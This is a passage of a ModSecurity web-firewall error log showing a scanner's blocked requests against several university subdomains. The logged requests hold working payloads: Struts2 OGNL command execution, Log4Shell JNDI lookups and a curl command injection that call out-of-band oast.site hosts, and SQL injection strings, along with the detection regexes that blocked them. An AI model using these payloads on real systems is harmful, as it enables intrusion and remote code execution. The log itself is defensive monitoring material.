{#context[\\x22xwork.MethodAccessor.denyMethodExecution\\x22]=false,#f=#_memberAccess.getClass().getDeclaredField(\\x22allowStaticMethodAccess\\x22),#f.setAccessib [hostname "unla.ac.id"] [uri "/index.action"] [unique_id "ZO11McCo-f0AAARtADoAAAAV"]
[Tue Aug 29 11:33:53.384181 2023] [:error] [pid 1138] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:action:${#context["xwork.MethodAccessor.denyMethodExecution"]=false,#f=#_memberAccess.getClass().getDeclaredField("allowStaticMethodAccess"),#f.setAccessible(true),#f.set(#_memberAccess,true),#a=@java.lang.Runtime@getRuntime().exec("sh -c id").getInputStream(),#b=new java.io.InputStreamReader(#a),#c=new java.io.BufferedReader(#b),#d=new char[5000],#c.read(#d),#genxor=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter(),#genxor.println(#d),#genxor.flush(),#genxor.close()}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: {#context[\\x22xwork.MethodAccessor.denyMethodExecution\\x22]=false,#f=#_memberAccess.getClass().getDeclaredField(\\x22allowStaticMethodAccess\\x22),#f.setAccessib [hostname "ft.unla.ac.id"] [uri "/index.action"] [unique_id "ZO11McCo-f0AAARy-1UAAAAb"]
[Tue Aug 29 11:33:53.417592 2023] [:error] [pid 1138] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:login. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:login: ${jndi:ldap://${:-594}${:-752}.${hostName}.postdata.cjmn8l5jmimk2adbbnlgfqxmrbeje5dtx.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/zdm/cxf/login"] [unique_id "ZO11McCo-f0AAARy-1YAAAAb"]
[Tue Aug 29 11:33:54.307196 2023] [:error] [pid 876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:account. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:account: admin' and  updatexml(1,concat(0x1,md5(999999999)),1) and '1'='1"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/zentao/user-login.html"] [unique_id "ZO11MsCo-f0AAANsAm8AAAAD"]
[Tue Aug 29 11:33:54.311096 2023] [:error] [pid 1117] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:account. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:account: admin' and  updatexml(1,concat(0x1,md5(999999999)),1) and '1'='1"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/zentao/user-login.html"] [unique_id "ZO11MsCo-f0AAARdiNsAAAAK"]
[Tue Aug 29 11:33:54.323601 2023] [:error] [pid 1138] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:account. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:account: admin' and  updatexml(1,concat(0x1,md5(999999999)),1) and '1'='1"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/zentao/user-login.html"] [unique_id "ZO11MsCo-f0AAARy-1cAAAAb"]
[Tue Aug 29 11:33:54.353653 2023] [:error] [pid 876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:sondata[ip]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:sondata[ip]: a|curl cjmn8l5jmimk2adbbnlgzu5ag6jmgkjjo.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/php/ping.php"] [unique_id "ZO11MsCo-f0AAANsAnEAAAAD"]
[Tue Aug 29 11:33:54.355912 2023] [:error] [pid 1138] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:account. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:account: admin' and  updatexml(1,concat(0x1,md5(999999999)),1) and '1'='1"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/zentao/user-login.html"] [unique_id "ZO11MsCo-f0AAARy-1gAAAAb"]
[Tue Aug 29 11:33:54.362762 2023] [:error] [pid 1104] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:login. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:login: ${jndi:ldap://${:-594}${:-752}.${hostName}.postdata.cjmn8l5jmimk2adbbnlgj671jk3tenebu.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/zdm/cxf/login"] [unique_id "ZO11MsCo-f0AAARQ4EgAAAAB"]
[Tue Aug 29 11:33:54.374483 2023] [:error] [pid 876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:account. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:account: admin' and  updatexml(1,concat(0x1,md5(999999999)),1) and '1'='1"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/zentao/user-login.html"] [unique_id "ZO11MsCo-f0AAANsAnIAAAAD"]
[Tue Aug 29 11:33:54.394607 2023] [:error] [pid 876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:redirectAction:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#matt.getWriter().println(#e),#matt.getWriter().flush(),#matt.getWriter().close()}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: {#a=(new  found within ARGS_NAMES:redirectAction:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com [hostname "journal.unla.ac.id"] [uri "/index.action"] [unique_id "ZO11MsCo-f0AAANsAnMAAAAD"]
[Tue Aug 29 11:33:54.403348 2023] [:error] [pid 1034] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:redirectAction:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#matt.getWriter().println(#e),#matt.getWriter().flush(),#matt.getWriter().close()}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: {#a=(new  found within ARGS_NAMES:redirectAction:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com [hostname "informatika.unla.ac.id"] [uri "/index.action"] [unique_id "ZO11MsCo-f0AAAQKOqwAAAAs"]
[Tue Aug 29 11:33:54.405274 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:redirectAction:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#matt.getWriter().println(#e),#matt.getWriter().flush(),#matt.getWriter().close()}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: {#a=(new  found within ARGS_NAMES:redirectAction:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com [hostname "unla.ac.id"] [uri "/index.action"] [unique_id "ZO11MsCo-f0AAAPDoK8AAAAP"]
[Tue Aug 29 11:33:54.422044 2023] [:error] [pid 1152] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:redirectAction:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#matt.getWriter().println(#e),#matt.getWriter().flush(),#matt.getWriter().close()}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: {#a=(new  found within ARGS_NAMES:redirectAction:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com [hostname "pusatbahasa.unla.ac.id"] [uri "/index.action"] [unique_id "ZO11MsCo-f0AAASAHfEAAAAH"]
[Tue Aug 29 11:33:54.425945 2023] [:error] [pid 1117] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:redirectAction:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#matt.getWriter().println(#e),#matt.getWriter().flush(),#matt.getWriter().close()}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: {#a=(new  found within ARGS_NAMES:redirectAction:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com [hostname "ft.unla.ac.id"] [uri "/index.action"] [unique_id "ZO11MsCo-f0AAARdiN8AAAAK"]
[Tue Aug 29 11:33:55.325651 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:redirectAction:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#matt.getWriter().println(#e),#matt.getWriter().flush(),#matt.getWriter().close()}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: {#a=(new  found within ARGS_NAMES:redirectAction:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com [hostname "informatika.unla.ac.id"] [uri "/login.action"] [unique_id "ZO11M8Co-f0AAAPDoLEAAAAP"]
[Tue Aug 29 11:33:55.332851 2023] [:error] [pid 1150] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:redirectAction:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#matt.getWriter().println(#e),#matt.getWriter().flush(),#matt.getWriter().close()}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: {#a=(new  found within ARGS_NAMES:redirectAction:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com [hostname "unla.ac.id"] [uri "/login.action"] [unique_id "ZO11M8Co-f0AAAR@KKQAAAAF"]
[Tue Aug 29 11:33:55.348192 2023] [:error] [pid 1123] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:redirectAction:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#matt.getWriter().println(#e),#matt.getWriter().flush(),#matt.getWriter().close()}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: {#a=(new  found within ARGS_NAMES:redirectAction:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com [hostname "pusatbahasa.unla.ac.id"] [uri "/login.action"] [unique_id "ZO11M8Co-f0AAARjjT8AAAAL"]
[Tue Aug 29 11:33:55.368318 2023] [:error] [pid 1152] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:item_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ) --  found within ARGS:item_id: 0 union select sleep(5) -- g"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZO11M8Co-f0AAASAHfQAAAAH"]
[Tue Aug 29 11:33:55.372642 2023] [:error] [pid 1123] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:redirectAction:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#matt.getWriter().println(#e),#matt.getWriter().flush(),#matt.getWriter().close()}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: {#a=(new  found within ARGS_NAMES:redirectAction:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com [hostname "ft.unla.ac.id"] [uri "/login.action"] [unique_id "ZO11M8Co-f0AAARjjUAAAAAL"]
[Tue Aug 29 11:33:55.373194 2023] [:error] [pid 1138] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:redirectAction:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#matt.getWriter().println(#e),#matt.getWriter().flush(),#matt.getWriter().close()}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: {#a=(new  found within ARGS_NAMES:redirectAction:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com [hostname "journal.unla.ac.id"] [uri "/login.action"] [unique_id "ZO11M8Co-f0AAARy-18AAAAb"]
[Tue Aug 29 11:33:55.395433 2023] [:error] [pid 1104] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:account. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:account: admin' and  updatexml(1,concat(0x1,md5(999999999)),1) and '1'='1"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/zentao/user-login.html"] [unique_id "ZO11M8Co-f0AAARQ4E8AAAAB"]
[Tue Aug 29 11:33:55.504593 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:item_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ) --  found within ARGS:item_id: 0 union select sleep(5) -- g"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/"] [unique_id "ZO11M8Co-f0AAAPDoLYAAAAP"]
[Tue Aug 29 11:33:55.515271 2023] [:error] [pid 1123] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:item_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ) --  found within ARGS:item_id: 0 union select sleep(5) -- g"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/"] [unique_id "ZO11M8Co-f0AAARjjUMAAAAL"]
[Tue Aug 29 11:33:55.523236 2023] [:error] [pid 1156] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:item_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ) --  found within ARGS:item_id: 0 union select sleep(5) -- g"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/"] [unique_id "ZO11M8Co-f0AAASEJSEAAAAE"]
